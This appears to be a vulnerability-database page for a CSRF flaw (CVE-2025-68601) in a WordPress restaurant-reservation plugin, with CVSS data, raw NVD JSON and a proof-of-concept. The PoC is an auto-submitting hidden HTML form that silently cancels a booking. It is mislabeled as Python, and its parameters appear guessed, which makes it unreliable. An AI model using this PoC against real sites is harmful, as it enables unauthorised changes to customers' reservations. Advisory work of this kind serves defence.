Security Vulnerability Report
中文
CVE-2025-68601 CVSS 5.4 MEDIUM

CVE-2025-68601

Published: 2025-12-24 13:16:28
Last Modified: 2026-04-27 19:16:36

Description

Cross-Site Request Forgery (CSRF) vulnerability in Rustaurius Five Star Restaurant Reservations restaurant-reservations allows Cross Site Request Forgery.This issue affects Five Star Restaurant Reservations: from n/a through <= 2.7.8.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Five Star Restaurant Reservations <= 2.7.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-68601 --> <!-- This PoC demonstrates modifying a restaurant reservation --> <!DOCTYPE html> <html> <head> <title>Reservation Update</title> </head> <body> <h1>Restaurant Reservation System</h1> <p>If you see this page, the CSRF attack has been executed.</p> <!-- Auto-submit form to modify reservation --> <form id="csrfForm" action="https://target-site.com/wp-admin/admin-post.php" method="POST" style="display:none;"> <input type="hidden" name="action" value="restaurant_reservations_update_booking"> <input type="hidden" name="booking_id" value="123"> <input type="hidden" name="status" value="cancelled"> <input type="hidden" name="nonce" value=""> </form> <script> // Auto-submit the form without user awareness document.getElementById('csrfForm').submit(); // Log result console.log('CSRF request sent for CVE-2025-68601'); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68601", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:27.650", "lastModified": "2026-04-27T19:16:35.910", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Rustaurius Five Star Restaurant Reservations restaurant-reservations allows Cross Site Request Forgery.This issue affects Five Star Restaurant Reservations: from n/a through <= 2.7.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/restaurant-reservations/vulnerability/wordpress-five-star-restaurant-reservations-plugin-2-7-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}